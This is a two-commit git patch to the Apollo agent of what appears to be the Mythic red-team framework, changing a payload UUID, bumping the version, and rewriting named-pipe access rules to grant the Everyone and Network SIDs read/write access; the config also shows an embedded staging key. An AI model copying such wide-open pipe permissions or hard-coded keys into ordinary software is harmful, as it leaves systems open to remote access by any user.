From a268cb52875454e12f39568d065ecf95dc5005d5 Mon Sep 17 00:00:00 2001 From: Dwight Hohnstein Date: Tue, 1 Feb 2022 13:36:06 -0800 Subject: [PATCH 1/2] sids over english --- Payload_Type/apollo/agent_code/Apollo/Config.cs | 2 +- .../ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Payload_Type/apollo/agent_code/Apollo/Config.cs b/Payload_Type/apollo/agent_code/Apollo/Config.cs index 25e616aa..b28d8d6e 100644 --- a/Payload_Type/apollo/agent_code/Apollo/Config.cs +++ b/Payload_Type/apollo/agent_code/Apollo/Config.cs @@ -116,7 +116,7 @@ public static class Config public static string StagingRSAPrivateKey = "LbFpMoimB+aLx1pq0IqXJ1MQ4KIiGdp0LWju5jUhZRg="; #endif #if HTTP - public static string PayloadUUID = "704f7dac-6122-4964-aebe-1100743dffbb"; + public static string PayloadUUID = "d3c67157-6842-41eb-bb16-d0eb79c207f7"; #elif SMB public static string PayloadUUID = "869c4909-30eb-4a90-99b2-874dae07a0a8"; #elif TCP diff --git a/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs b/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs index e763e123..62054afc 100644 --- a/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs +++ b/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs @@ -37,8 +37,8 @@ public AsyncNamedPipeServer(string pipename, PipeSecurity ps = null, int instanc { _pipeSecurity = new PipeSecurity(); PipeAccessRule multipleInstances = new PipeAccessRule(WindowsIdentity.GetCurrent().Name, PipeAccessRights.CreateNewInstance, AccessControlType.Allow); - PipeAccessRule everyoneAllowedRule = new PipeAccessRule("Everyone", PipeAccessRights.ReadWrite, AccessControlType.Allow); - PipeAccessRule networkAllowRule = new PipeAccessRule("Network", PipeAccessRights.ReadWrite, AccessControlType.Allow); + PipeAccessRule everyoneAllowedRule = new PipeAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), PipeAccessRights.ReadWrite, AccessControlType.Allow); + PipeAccessRule networkAllowRule = new PipeAccessRule(new SecurityIdentifier(WellKnownSidType.NetworkSid, null), PipeAccessRights.ReadWrite, AccessControlType.Allow); _pipeSecurity.AddAccessRule(multipleInstances); _pipeSecurity.AddAccessRule(everyoneAllowedRule); _pipeSecurity.AddAccessRule(networkAllowRule); From 7f520441e88c6bc6fb063e2fcc0c3ee2dab2d2ce Mon Sep 17 00:00:00 2001 From: Dwight Hohnstein Date: Tue, 1 Feb 2022 17:05:09 -0800 Subject: [PATCH 2/2] updating version --- Payload_Type/apollo/mythic/agent_functions/builder.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payload_Type/apollo/mythic/agent_functions/builder.py b/Payload_Type/apollo/mythic/agent_functions/builder.py index b842d766..4f1f1c09 100644 --- a/Payload_Type/apollo/mythic/agent_functions/builder.py +++ b/Payload_Type/apollo/mythic/agent_functions/builder.py @@ -14,7 +14,7 @@ class Apollo(PayloadType): supported_os = [ SupportedOS.Windows ] - version = "2.0.1" + version = "2.0.2" wrapper = False wrapped_payloads = ["service_wrapper"] note = """